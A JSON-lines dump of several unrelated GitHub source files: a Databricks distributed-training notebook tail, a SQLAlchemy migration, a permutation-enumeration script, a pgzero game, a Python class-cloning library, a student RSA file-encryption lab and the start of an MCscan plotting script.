マルチGPUシングルノードからマルチノードのトレーニングに移行するには、すべてのワーカーノードで利用したいGPUの数に`num_processes`を変更するだけです。このサンプルではすべてのGPU(`NUM_GPUS_PER_NODE * NUM_WORKERS`)を使用しています。また、`local_mode`を`False`に設定します。さらに、トレーニング関数を実行するそれぞれのSparkタスクでいくつのGPUを使用するのかを設定するには、クラスターを作成する前にクラスターページにあるSpark設定で`set spark.task.resource.gpu.amount `を設定します。\n\n# COMMAND ----------\n\nmulti_node_dir = create_log_dir()\nprint(\"Data is located at: \", multi_node_dir)\n\noutput_dist = TorchDistributor(num_processes=2, local_mode=False, use_gpu=True).run(main_fn, multi_node_dir)\ntest(multi_node_dir)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC # END\n","repo_name":"taka-yayoi/public_repo_2","sub_path":"TorchDistributor_end_to_end_sample/Databricksノートブックにおけるエンドツーエンドの分散トレーニング.py","file_name":"Databricksノートブックにおけるエンドツーエンドの分散トレーニング.py","file_ext":"py","file_size_in_byte":15526,"program_lang":"python","lang":"ja","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"38806644202","text":"from migrate import ForeignKeyConstraint\n\nfrom rack.openstack.common.gettextutils import _\nfrom rack.openstack.common import log as logging\n\nfrom sqlalchemy import Boolean, DateTime, Integer, String, Text\nfrom sqlalchemy import Column, MetaData, Table\n\nLOG = logging.getLogger(__name__)\n\nmeta = MetaData()\n\nkeypairs = Table('keypairs', meta,\n Column('created_at', DateTime),\n Column('updated_at', DateTime),\n Column('deleted_at', DateTime),\n Column('deleted', Integer),\n Column('keypair_id', String(length=36),\n primary_key=True, nullable=False),\n Column('gid', String(length=36), nullable=False),\n Column('nova_keypair_id', String(length=255)),\n Column('private_key', Text),\n Column('display_name', String(length=255)),\n Column('is_default', Boolean),\n Column('user_id', String(length=255)),\n Column('project_id', String(length=255)),\n mysql_engine='InnoDB',\n mysql_charset='utf8'\n )\n\n\ndef upgrade(migrate_engine):\n meta.bind = migrate_engine\n\n try:\n keypairs.create()\n groups = Table(\"groups\", meta, autoload=True)\n ForeignKeyConstraint([keypairs.c.gid], [groups.c.gid]).create()\n except Exception:\n LOG.info(repr(keypairs))\n LOG.exception(_('Exception while creating keypairs table.'))\n raise\n\n\ndef downgrade(migrate_engine):\n meta.bind = migrate_engine\n\n try:\n keypairs.drop()\n except Exception:\n LOG.info(repr(keypairs))\n LOG.exception(_('Exception while dropping keypairs table.'))\n raise\n","repo_name":"tkaneko0204/rack","sub_path":"rack/db/sqlalchemy/migrate_repo/versions/003_Add_keypairs_table.py","file_name":"003_Add_keypairs_table.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20491894869","text":"import sys\nimport math\nimport networkx as nx\nfrom numpy.core.fromnumeric import transpose\nfrom numpy.lib.function_base import place\nimport pyvis.network\nimport numpy as np\n\n\nSOLUTIONS_LIST = []\nEQUIVALENCE_DUMP = set()\n\n\ndef create_all_equiv(transposition_list):\n equiv_list = [transposition_list]\n current_transposition = sort_and_make(transposition_list)\n while(not current_transposition == transposition_list):\n equiv_list.append(current_transposition)\n current_transposition = sort_and_make(current_transposition)\n if len(current_transposition) < len(transposition_list):\n print(transposition_list, \"got turned into\", current_transposition)\n break\n # print(\"all done!\")\n return equiv_list\n\n\ndef standard_order(transposition_list):\n new_t_list = transposition_list\n for t in range(len(new_t_list)-1):\n transposition = new_t_list[t]\n next_transposition = new_t_list[t+1]\n if transposition+1 < next_transposition:\n new_t_list[t] = next_transposition\n new_t_list[t+1] = transposition\n return standard_order(new_t_list)\n return new_t_list\n\n\ndef sort_and_make(transposition_list):\n final_transposition_list = []\n pools = create_pools(transposition_list)\n # for pool in pools:\n # print(pool)\n even_list = []\n for i in range(math.ceil(len(pools)/2)):\n even_list.append(find_endpoint(pools[i*2]))\n # for _ in range(15):\n while(True):\n protected = np.zeros(len(even_list))\n for i in range(math.floor(len(pools)/2)):\n pool = pools[i*2+1]\n items_to_remove = []\n for item in pool:\n marked = [None, None]\n for e in range(len(even_list)):\n even = even_list[e]\n if item[0] == even:\n marked[0] = e\n elif item[1] == even:\n marked[1] = e\n if marked[0] is not None and marked[1] is not None:\n final_transposition_list.append(\n len(pools)-1-(marked[0]+marked[1]))\n # print(\"b\", len(pools)-1-(marked[0]+marked[1]))\n items_to_remove.append(item)\n elif marked[0] is not None:\n protected[marked[0]] = 1\n elif marked[1] is not None:\n protected[marked[1]] = 1\n for item in items_to_remove:\n pool.remove(item)\n even_list, pools, to_append = increment_vertices(\n even_list, pools, protected)\n for transposition in to_append:\n final_transposition_list.append(transposition)\n if sum([len(pool) for pool in pools]) == max(transposition_list) % 2:\n break\n return standard_order(final_transposition_list)\n\n\ndef find_endpoint(pool):\n if pool[0][1] is None:\n return pool[0][0]\n full_list = []\n for entry in pool:\n for i in range(2):\n if entry[i] in full_list:\n full_list.remove(entry[i])\n else:\n full_list.append(entry[i])\n return full_list[[entry[0] for entry in full_list].index(min([entry[0] for entry in full_list]))]\n\n\ndef increment_vertices(currents, pools, protected):\n newPool = pools\n new_current = currents\n transpositions = []\n for i in range(len(currents)):\n item = currents[i]\n if protected[i] == 0 and len(newPool[i*2]) > 0 and newPool[i*2][0][1] is not None:\n new_current[i], newPool[i *\n 2] = get_next_from_pool(item, newPool[i*2])\n transpositions.append(len(pools)-1-i*2)\n # print(\"a\", len(pools)-1-i*2)\n break\n return new_current, newPool, transpositions\n\n\ndef get_next_from_pool(current, list):\n newList = list\n for item in list:\n if item[0] == current:\n newList.remove(item)\n current = item[1]\n return(current, newList)\n elif item[1] == current:\n newList.remove(item)\n current = item[0]\n return(current, newList)\n return(current, newList)\n\n\ndef create_pools(transposition_list):\n bitmasks = all_bitmasks(transposition_list)\n pools = []\n if max(transposition_list) % 2 == 1:\n pools.append([((max(transposition_list)-1, 0), (None))])\n for b in range(len(bitmasks)):\n pools.append([])\n vx = vertex_form(transposition_list)\n for i in range(max(transposition_list)+1):\n for n in range(len(transposition_list)):\n if transposition_list[n] == i:\n for b in range(len(bitmasks)):\n if bitmasks[b][n] == 1:\n pools[b+max(transposition_list) % 2].append(vx[n])\n break\n # for pool in pools:\n # print(pool)\n return pools\n\n\ndef vertex_form(transposition_list):\n current_count = np.zeros(1+math.ceil(max(transposition_list)/2))\n vx_list = []\n for i in transposition_list:\n vx = np.zeros((2, 2))\n if i % 2 == 0:\n vx = ((i, int(current_count[int(i/2)])),\n (i, int(current_count[int(i/2)]+1)))\n current_count[int(i/2)] += 1\n else:\n vx = ((i-1, int(current_count[int((i-1)/2)])),\n (i+1, int(current_count[int((i+1)/2)])))\n vx_list.append(vx)\n return vx_list\n\n\ndef all_bitmasks(transposition_list, raw=True):\n bitmask_list = []\n current_bitmask = np.zeros(len(transposition_list))\n mx = max(transposition_list)\n layers = math.ceil(mx/2)\n if mx % 2 == 0:\n short_line = short_line_bitmask(\n transposition_list, np.zeros(len(transposition_list)))\n if raw:\n bitmask_list.append(short_line)\n else:\n bitmask_list.append((\"short\", short_line))\n current_bitmask += short_line\n short_pad = short_pad_bitmask(transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(short_pad)\n else:\n bitmask_list.append((\"padding\", short_pad))\n current_bitmask += short_pad\n else:\n point = point_bitmask(transposition_list)\n if raw:\n bitmask_list.append(point)\n else:\n bitmask_list.append((\"point\", point))\n current_bitmask += point\n for layer in range(layers):\n if layer == layers - 1:\n short_line = short_line_bitmask(\n transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(short_line)\n else:\n bitmask_list.append((\"short\", short_line))\n current_bitmask += short_line\n else:\n line = line_bitmask(transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(line)\n else:\n bitmask_list.append((\"line\", line))\n current_bitmask += line\n pad = pad_bitmask(transposition_list, current_bitmask)\n if raw:\n bitmask_list.append(pad)\n else:\n bitmask_list.append((\"padding\", pad))\n current_bitmask += pad\n return bitmask_list\n\n\ndef point_bitmask(transposition_list):\n mx = max(transposition_list)\n bitmask = np.zeros(len(transposition_list))\n for t in range(len(transposition_list)):\n if transposition_list[t]+3 > mx:\n bitmask[t] = 1\n if transposition_list[t]+1 == mx:\n break\n return bitmask\n\n\ndef short_pad_bitmask(transposition_list, ignore_list):\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = [0, 0]\n for t in range(len(mod_list)):\n if mod_list[t] == mx and target_numbers_found[0] == 0:\n bitmask[t] = 1\n target_numbers_found[0] = 1\n elif transposition_list[t]+1 == mx and ignore_list[t] == 0 and sum(target_numbers_found) < 2:\n bitmask[t] = 1\n elif transposition_list[t]+2 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n target_numbers_found[1] = 1\n elif transposition_list[t]+3 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n return bitmask\n\n\ndef pad_bitmask(transposition_list, ignore_list):\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n if mx % 2 == 0:\n mx += 1\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = [0, 0]\n for t in range(len(mod_list)):\n if mod_list[t] == mx:\n bitmask[t] = 1\n elif transposition_list[t]+1 == mx and ignore_list[t] == 0 and target_numbers_found[0] == 0:\n bitmask[t] = 1\n target_numbers_found[0] = 1\n elif transposition_list[t]+2 == mx and ignore_list[t] == 0 and sum(target_numbers_found) < 2:\n bitmask[t] = 1\n elif transposition_list[t]+3 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n target_numbers_found[1] = 1\n elif transposition_list[t]+4 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n return bitmask\n\n\ndef short_line_bitmask(transposition_list, ignore_list):\n if not sum(ignore_list) == 0:\n return 1 - ignore_list\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n if mx % 2 == 1:\n mx += 1\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = 0\n for t in range(len(mod_list)):\n if transposition_list[t]+3 > mx and ignore_list[t] == 0 and target_numbers_found == 0:\n bitmask[t] = 1\n if transposition_list[t]+1 == mx and ignore_list[t] == 0:\n target_numbers_found = 1\n return bitmask\n\n\ndef line_bitmask(transposition_list, ignore_list):\n mod_list = transposition_list*(1-ignore_list)\n mx = max(mod_list)\n if mx % 2 == 1:\n mx += 1\n bitmask = np.zeros(len(mod_list))\n target_numbers_found = [0, 0]\n for t in range(len(mod_list)):\n if mod_list[t] == mx:\n bitmask[t] = 1\n elif transposition_list[t]+1 == mx and ignore_list[t] == 0 and target_numbers_found[0] == 0:\n bitmask[t] = 1\n target_numbers_found[0] = 1\n elif transposition_list[t]+2 == mx and ignore_list[t] == 0 and sum(target_numbers_found) < 2:\n bitmask[t] = 1\n elif transposition_list[t]+3 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n target_numbers_found[1] = 1\n elif transposition_list[t]+4 == mx and ignore_list[t] == 0 and target_numbers_found[1] == 0:\n bitmask[t] = 1\n return bitmask\n\n\ndef create_transpositions_list(current_list, current_length, target_length):\n if current_length == target_length:\n SOLUTIONS_LIST.append(current_list)\n return None\n for pos in range(len(current_list)+1):\n new_list = []\n for i in range(pos):\n new_list.append(current_list[i]+1)\n for i in range(current_length):\n new_list.append(i)\n for i in range(len(current_list)-pos):\n new_list.append(current_list[i+pos])\n create_transpositions_list(\n new_list, current_length+1, target_length)\n\n\ndef create_full_transpositions_list(current_list, current_result):\n length = len(current_result.keys())\n for i in range(length-1):\n # if i > len(current_list):\n # break\n if len(current_list) > 0 and i > current_list[-1]+1:\n break\n # if len(current_list) > length-1 and current_list[-1] == length-2 and current_list[1-length] == 0 and current_list[-length] < i:\n # break\n temp_low = current_result.get(i)\n temp_high = current_result.get(i+1)\n if temp_low < temp_high:\n new_list = current_list.copy()\n new_list.append(i)\n current_result.update({i+1: temp_low})\n current_result.update({i: temp_high})\n create_full_transpositions_list(new_list, current_result)\n current_result.update({i+1: temp_high})\n current_result.update({i: temp_low})\n flatten = tuple(current_list)\n if(len(current_list) == (((length-1)**2+length-1)/2)):\n if not flatten in EQUIVALENCE_DUMP:\n for equiv_list in create_all_equiv(current_list):\n EQUIVALENCE_DUMP.add(tuple(equiv_list))\n SOLUTIONS_LIST.append(current_list)\n\n\ndef graph_transposition_list(transposition_list):\n net = pyvis.network.Network(notebook=True)\n graph = nx.Graph()\n active_vertex_list = []\n next_vertex = 0\n slots = math.ceil((len(transposition_list)/2)**(1/2))\n for i in range(slots):\n active_vertex_list.append(next_vertex)\n graph.add_node(next_vertex)\n next_vertex += 1\n for element in transposition_list:\n if element % 2 == 0:\n previous_vertex = active_vertex_list[int(element/2)]\n active_vertex_list[int(element/2)] = next_vertex\n graph.add_edge(previous_vertex, next_vertex)\n next_vertex += 1\n else:\n graph.add_edge(\n active_vertex_list[int((element-1)/2)], active_vertex_list[int((element+1)/2)])\n print(graph.nodes())\n print(graph.edges())\n net.from_nx(graph)\n file_name = 'output/graph'+str(transposition_list)+'.html'\n net.show(file_name)\n # nx.draw(graph, with_labels=True, font_weight='bold')\n\n\nif __name__ == '__main__':\n # print([i for i in create_all_equiv([int(i)\n # for i in sys.argv[1].split(\",\")])])\n # SOLUTIONS_LIST.append([int(i) for i in sys.argv[1].split(\",\")])\n\n starting_arrangement = {}\n for i in range(int(sys.argv[1])):\n starting_arrangement.update({i: i})\n create_full_transpositions_list([], starting_arrangement)\n # create_transpositions_list([], 1, int(sys.argv[1]))\n # print(SOLUTIONS_LIST)\n if(len(sys.argv) > 2):\n for transposition_list in SOLUTIONS_LIST:\n graph_transposition_list(transposition_list)\n print(len(SOLUTIONS_LIST))\n\n # print(\"\\n \", SOLUTIONS_LIST[0])\n # print(\"vx form = \", vertex_form(SOLUTIONS_LIST[0]))\n # create_pools(SOLUTIONS_LIST[0])\n # a = sort_and_make(SOLUTIONS_LIST[0])\n # print(a)\n # bitmasks = all_bitmasks(SOLUTIONS_LIST[0], False)\n # for bitmask in bitmasks:\n # print(f'{bitmask[0]:<8}', bitmask[1])\n # graph_transposition_list(SOLUTIONS_LIST[0])\n","repo_name":"SDhn2a/math400","sub_path":"geodesic_permutations.py","file_name":"geodesic_permutations.py","file_ext":"py","file_size_in_byte":14596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38753715697","text":"from turtle import Screen\r\nimport pgzrun\r\nfrom pgzhelper import *\r\n\r\nWIDTH=750 \r\nHEIGHT=475\r\nchuongngaivat=[]\r\ntxuathien=0\r\ndiem=0\r\nnhaylen=0\r\nroixuong=1\r\nketthuc=False\r\n\r\n\r\nphongnen=Actor('background') #Them_background\r\nkhunglong=Actor('run1') #Them hinh con khung long\r\nkhunglong.x=100 #toa do\r\nkhunglong.y=400\r\nhoatanhchay=['run1','run2','run3','run4','run5','run6','run7','run8'] #hoat anh chay\r\nkhunglong.images=hoatanhchay\r\n\r\ndef update():\r\n global txuathien, diem, nhaylen, roixuong, ketthuc, chuongngaivat\r\n khunglong.next_image() # Chuyen hinh anh run1->run2->...run7\r\n txuathien+=1\r\n if txuathien > 100:\r\n xuongrong=Actor('catus') #Them hinh anh xuong rong\r\n xuongrong.x=900 #Toa do xuong rong\r\n xuongrong.y=370\r\n chuongngaivat.append(xuongrong)\r\n txuathien=0\r\n for xuongrong in chuongngaivat: #hoat anh xuong rong di chuyen\r\n xuongrong.x-=10\r\n if xuongrong.x<80: #cach tinh diem\r\n diem+=1\r\n chuongngaivat.remove(xuongrong)\r\n if keyboard.up and khunglong.y==400 : #hoat anh nhay\r\n nhaylen=-25\r\n sounds.impact.play()\r\n khunglong.y+=nhaylen\r\n nhaylen+=roixuong\r\n if khunglong.y>400: #gooi han do cao\r\n nhaylen=0\r\n khunglong.y=400\r\n if khunglong.collidelist(chuongngaivat)!=-1: #cach tinh va cham\r\n ketthuc=True\r\n chuongngaivat.remove(xuongrong)\r\n sounds.gameover.play()\r\n if keyboard.space: #bat dau lai\r\n ketthuc=False\r\n diem=0\r\n chuongngaivat=[]\r\n\r\n \r\n\r\n\r\ndef draw():\r\n phongnen.draw() # Ve background\r\n\r\n if ketthuc:\r\n screen.draw.text( 'Game over',(280,200),color=(0,0,0),fontsize=50)\r\n screen.draw.text('Diem so:'+ str(diem),(280,230),color=(0,0,0),fontsize=50)\r\n screen.draw.text( 'Nhan SPACE de bat dau lai',(170,270),color=(255,0,255),fontsize=50)\r\n\r\n else:\r\n khunglong.draw()\r\n for xuongrong in chuongngaivat:\r\n xuongrong.draw()\r\n screen.draw.text('DIEM SO: '+ str(diem),(10,15),color=(255,0,255),fontsize=35)\r\npgzrun.go() #Khoi chay\r\n","repo_name":"TrucLoann/KTLTrinh","sub_path":"Final code.py","file_name":"Final code.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19997238776","text":"from inspect import isfunction\nfrom sys import version_info\nfrom types import FunctionType\n\nfrom flatmirror import (flatmirror, ABCMeta, next, partial,\n _get_meta_params, _get_registered_cls)\n\n__all__ = ('clonecls', 'clonefunc', 'clone', 'flatmirror',\n 'ContainsAll', 'IdentContainer')\n\n\n# Constants and builtins:\n\nif version_info[0] >= 3:\n import builtins\n FUNC_ATTR_MAP = {\n '__globals__': '__globals__',\n '__closure__': '__closure__',\n '__code__': '__code__',\n }\n basestring = str\nelse:\n import __builtin__ as builtins\n FUNC_ATTR_MAP = {\n '__globals__': 'func_globals',\n '__closure__': 'func_closure',\n '__defaults__': 'func_defaults',\n '__code__': 'func_code',\n '__dict__': 'func_dict',\n }\nBUILTIN_OBJS = vars(builtins).values()\nSOME_FUNC_ATTRS = [FUNC_ATTR_MAP.get(a, a)\n for a in ('__defaults__', '__doc__',\n '__module__', '__name__')]\nSOME_FUNC_DICTS = [FUNC_ATTR_MAP.get(a, a)\n for a in ('__dict__', '__annotations__', '__kwdefaults__')]\n\n\n# Auxiliary types:\n\nclass IdentContainer(object):\n \"\"\"Simple container with identity-based 'in'-test.\"\"\"\n def __init__(self, actual_container):\n \"\"\"Initialize with an actual container.\"\"\"\n self.actual_container = actual_container\n def __contains__(self, key):\n for obj in self.actual_container:\n if obj is key:\n return True\n return False\n\nclass ContainsAll(object):\n \"\"\"Dummy container -- always returning True for 'in'-test.\"\"\"\n def __contains__(self, key):\n return True\n\n\n# Public functions:\n\ndef clonefunc(func, to_update=None): # side effect on the to_update list!\n \"\"\"Clone a given function (for user-defined only, i.e. not builtins etc.).\n\n Arguments:\n * func\n -- the function to be cloned;\n * to_update [default: None]\n -- if a list or True given, all function dicts (globals, function\n __dict__, kw-defaults, annotations) will be copied using their\n copy() methods; additionaly, for a list, all copied dictionaries\n will be appended to that list.\n\n See clonetools/test.py for some usage examples.\n \"\"\"\n func_globals = getattr(func, FUNC_ATTR_MAP['__globals__'])\n lets_append = isinstance(to_update, list)\n if lets_append or to_update:\n func_globals = func_globals.copy()\n if lets_append:\n to_update.append(func_globals)\n newfunc = FunctionType(getattr(func, FUNC_ATTR_MAP['__code__']),\n func_globals,\n closure=getattr(func, FUNC_ATTR_MAP['__closure__']))\n for attr in SOME_FUNC_ATTRS:\n setattr(newfunc, attr, getattr(func, attr))\n for attr in SOME_FUNC_DICTS:\n a_dict = getattr(func, attr, None)\n if a_dict is not None:\n if lets_append or to_update:\n a_dict = a_dict.copy()\n if lets_append:\n to_update.append(a_dict)\n setattr(newfunc, attr, a_dict)\n return newfunc\n\n\ndef clonecls(cls, slots=None, exclude=('__dict__', '__weakref__'),\n to_clone=None, dict_factory=None, metacls=None,\n metacls_kwargs=None, register='abc', ignore_base_err=False):\n \"\"\"Clone a given class (typically cloning also its bases, except builtins).\n\n Arguments:\n * cls\n -- the class to be cloned;\n * slots [default: None]\n -- if not None, __slots__ attribute is added to the cloned class\n and its cloned superclasses; the actual argument content is added\n to the highest possible class in the hierarchy, the remaining __slots__\n attributes are left empty; all __slots__ contents found in classes are\n preserved;\n * exclude [default: ('__dict__', '__weakref__')]\n -- a sequence of names of attributes that should not be mirrored/cloned;\n * to_clone [default: all superclasses of cls (excluding cls)]\n -- a container of superclasses that should be cloned (excluding cls);\n * dict_factory [default: type(cls.__dict__); but dict if it was dictproxy]\n -- a factory (type/function) to make the __dict__ attribute of the\n created class;\n * metacls [default: type(cls)]\n -- a factory (metaclass) to be used to create the class;\n * metacls_kwargs [default: {}]\n -- keyword arguments for that metaclass;\n * register [default: 'abc']\n -- a callable to be called with the newly created class as the argument,\n or 'abc' -- call cls.register only if isinstance(cls, abc.ABCMeta),\n or True -- call cls.register (unconditionally),\n or False -- do not call anything (unconditionally);\n * ignore_base_err [default: False]\n -- if true, ignore Atribute|TypeErrors occuring when a base class\n is being cloned: instead of raising exceptions, return original\n class objects.\n \"\"\"\n to_update = []\n old2new_classes = {}\n if slots is not None:\n if isinstance(slots, basestring):\n slots = (slots,)\n slots = list(slots)\n if to_clone is not None:\n to_clone = IdentContainer((cls,) + tuple(to_clone))\n else:\n to_clone = ContainsAll()\n new_cls = _clone_cls(cls, slots, to_update, old2new_classes,\n exclude, to_clone, dict_factory,\n metacls, metacls_kwargs, ignore_base_err)\n if new_cls is cls:\n raise TypeError('%r cannot be cloned' % cls)\n for a_dict in to_update:\n for k, obj in a_dict.items():\n for old, new in old2new_classes.items():\n if obj is old:\n a_dict[k] = new\n break\n return _get_registered_cls(new_cls, cls, register)\n\n\ndef clone(*args, **kwargs):\n \"\"\"Call clonefunc()/clonecls() (depending on the first argument type).\"\"\"\n if isfunction(args[0]):\n return clonefunc(*args, **kwargs)\n else:\n return clonecls(*args, **kwargs)\n\n\n# Non-public functions:\n\ndef _get_newslots_and_excl(cls, slots, exclude):\n cls_slots = getattr(cls, '__slots__', None)\n if cls_slots is not None:\n if isinstance(cls_slots, basestring):\n cls_slots = (cls_slots,)\n excl = set(exclude).union(cls_slots)\n new_slots = list(cls_slots)\n if slots is not None:\n new_slots.extend(slots)\n else:\n excl = set(exclude)\n if slots is not None:\n new_slots = list(slots)\n else:\n new_slots = None\n excl.add('__slots__')\n return new_slots, excl\n\ndef _clone_cls(cls, # side effect on these\n slots, to_update, old2new_classes, # <- mutable arguments!\n exclude, to_clone, dict_factory,\n metacls, metacls_kwargs, ignore_base_err,\n _builtin_objs=IdentContainer(BUILTIN_OBJS)):\n if cls not in to_clone or cls in _builtin_objs:\n return cls\n try:\n (bases # recursion:\n ) = tuple(_clone_cls(basecls, slots, to_update, old2new_classes,\n exclude, to_clone, dict_factory,\n metacls, metacls_kwargs, ignore_base_err)\n for basecls in cls.__bases__)\n old2new_classes.update((old, new)\n for old, new in zip(cls.__bases__, bases)\n if old is not new)\n (dict_factory, metacls, metacls_kwargs\n ) = _get_meta_params(cls, dict_factory, metacls, metacls_kwargs)\n attrdict = dict_factory()\n new_slots, to_exclude = _get_newslots_and_excl(cls, slots, exclude)\n if new_slots is not None:\n attrdict['__slots__'] = new_slots\n for attrname, obj in cls.__dict__.items():\n if attrname not in to_exclude:\n if isfunction(obj):\n obj = clonefunc(obj, to_update)\n attrdict[attrname] = obj\n name = getattr(cls, '__name__', '') + '_clone'\n new_cls = metacls(name, bases, attrdict, **metacls_kwargs)\n except (TypeError, AttributeError):\n if ignore_base_err:\n return cls\n raise\n else:\n if slots is not None:\n del slots[:]\n return new_cls\n","repo_name":"zuo/Zuo-s-Recipes-and-Drafts","sub_path":"clonetools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"6477836781","text":"#Various imports \r\nimport myEncryption\r\nimport myDecryption\r\nimport os\r\nimport constants\r\nimport RSAEncrypt\r\nimport json\r\nfrom base64 import b64encode, b64decode\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives import serialization\r\nfrom cryptography.hazmat.backends import default_backend\r\n\r\n#Beginning of main \r\ndef main():\r\n\twhile(True):\r\n\t\tprint(\"***HJ Corp Encryptor***\")\r\n\t\tprint(\"Select the number of one of the following commands:\")\r\n\t\tprint(\"1) Generate RSA tokens\")\r\n\t\tprint(\"2) Encrypt a file using RSA\")\r\n\t\tprint(\"3) Decrypt a file \")\r\n\t\topCommand = input(\"Choose a command:\")\r\n\t\tif opCommand == \"1\":\r\n\t\t\tRSA_key_path = input(\"Please enter the path where you would like to save the keys and name: \")\r\n\t\t\trsaPrivKey = rsa.generate_private_key(public_exponent=65537, key_size = 2048, backend = default_backend())\r\n\t#Generate public key from privatekey\r\n\t\t\trsaPubKey = rsaPrivKey.public_key()\r\n\t#Serialize keys for file\r\n\t\t\tprivPem = rsaPrivKey.private_bytes(encoding=serialization.Encoding.PEM, format = serialization.PrivateFormat.TraditionalOpenSSL, encryption_algorithm=serialization.NoEncryption())\r\n\t\t\tpubPem = rsaPubKey.public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo)\r\n\t#split path from file name\r\n\t\t\tkPath, kName =os.path.split(RSA_key_path)\r\n\t#Check if path is a directory, create it if it does not exist\r\n\t\t\tif kPath != \"\":\r\n\t\t\t\tos.makedirs(kPath)\r\n\t#if there is no tail, add \"default\" to key path for key gen \r\n\t\t\tif kName == \"\":\r\n\t\t\t\tprint (\"No name entered. default.pem, default.pub will be created in chosen directory\")\r\n\t\t\t\tRSA_key_path = RSA_key_path + \"default\"\r\n\t#Write keys to files\r\n\t\t\tcreateFile = open(RSA_key_path+\".pem\", \"wb\")\r\n\t\t\tcreateFile.write(privPem)\r\n\t\t\tcreateFile.close()\r\n\t\t\tcreateFile = open(RSA_key_path+\".pub\", \"wb\")\r\n\t\t\tcreateFile.write(pubPem)\r\n\t\t\tcreateFile.close()\r\n\t\t\tprint(kName,\".pem and \", kName,\".pub have been created at \",kPath)\r\n\t#User enters encrypt option\r\n\t\telif opCommand =='2':\r\n\t\t\tprint (\"Enter the location of the file you would like to RSA encrypt\")\r\n\t\t\tencryptedFile = promptForFile()\r\n\t\t\tprint (\"Enter location of the public key (.pub extension): \")\r\n\t\t\trsaPath = promptForFile()\r\n\t\t\tRSACipher, cipher, IV, ext = RSAEncrypt.myRSAEncrypt(encryptedFile,rsaPath)\r\n\t#Prompt user for what they would like to save the name as and add custom extension\r\n\t\t\tsaveAs = input(\"Save encrypted file as (will be assigned .cryp extension: \")\r\n\t\t\tfileEncrypted = saveAs + \".cryp\"\r\n\t#Create new file and write cipher text to it\r\n\t\t\tfEncrypt = open(fileEncrypted,\"w\")\r\n\t\t\tfileInfo = {}\r\n\t\t\tfileInfo[\"key\"] = b64encode(RSACipher).decode('utf-8')\r\n\t\t\tfileInfo[\"cipher\"] = b64encode(cipher).decode('utf-8')\r\n\t\t\tfileInfo[\"iv\"] = b64encode(IV).decode('utf-8')\r\n\t\t\tfileInfo[\"ext\"] = ext\r\n\t\t\tjson.dump(fileInfo, fEncrypt)\r\n\t\t\tfEncrypt.close()\r\n\t\t\tprint(\"Encryption complete.\")\r\n\t\telif opCommand == '3':\r\n\t\t\tprint(\"Enter the path of the the file you want to decrypt.\")\r\n\t\t\tdFile = promptForFile()\t\r\n\t\t\tRSACipher, cipher, IV, ext= jsonUnpack(dFile)\r\n\t\t\tprint(\"Enter location of private key(.pem extension):\")\r\n\t\t\tprivPath = promptForFile()\r\n\t\t\tRSAEncrypt.myRSADecrypt(RSACipher, cipher, IV, ext, privPath)\r\n\t\telif opCommand == '4':\r\n\t\t\tprint(\"Exiting...\")\r\n\t\t\tbreak;\r\n\t\telse:\r\n\t\t\tprint(\"Error command\")\t\r\n#End of main\r\n\r\ndef promptForFile():\r\n\t#Prompt to check if file path is valid. E to exit\r\n\twhile(True):\r\n\t\tuserFile = input(\"Enter location of file: \")\r\n\t\tif userFile == \"E\":\r\n\t\t\treturn userFile\r\n\t\tif os.path.isfile(userFile):\r\n\t\t\treturn userFile\r\n\t\telse:\r\n\t\t\tprint (\"File not found!\")\r\ndef jsonUnpack(filepath):\r\n\tjsonFile = open(filepath, 'r')\r\n\tjLoad = json.load(jsonFile)\r\n\tjsonFile.close()\r\n\tjKey = b64decode(jLoad[\"key\"])\r\n\tjCipher = b64decode(jLoad[\"cipher\"])\r\n\tjIV = b64decode(jLoad[\"iv\"])\r\n\tjExt = jLoad[\"ext\"]\r\n\treturn jKey, jCipher, jIV, jExt\r\nif __name__==\"__main__\":\r\n\tmain()\r\n","repo_name":"harditsingh95/378","sub_path":"fileEncryptionLab/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19416631864","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n\n\"\"\"\n%prog mcscan.txt all.bed layout.csv\n\nIllustrate MCscan multiple collinearity alignments. Use layout.csv to indicate\nthe positions of tracks. For example:\n\n#x, y, rotation, ha, va, color, ratio\n0.5, 0.6, 0, left, center, g\n0.25, 0.7, 45, center, center, m\n\nWith the row ordering corresponding to the column ordering in the MCscan output.\n\nFor \"ha\" (horizontal alignment), accepted values are: left|right|leftalign|rightalign|center|\"\"(empty)\nFor \"va\" (vertical alignment), accepted values are: top|bottom|center|\"\"(empty)\n\"\"\"\n\nimport sys\nimport logging\nimport numpy as np\n\nfrom typing import Optional\n\nfrom jcvi.compara.synteny import BlockFile\nfrom jcvi.formats.bed import Bed\nfrom jcvi.formats.base import DictFile\nfrom 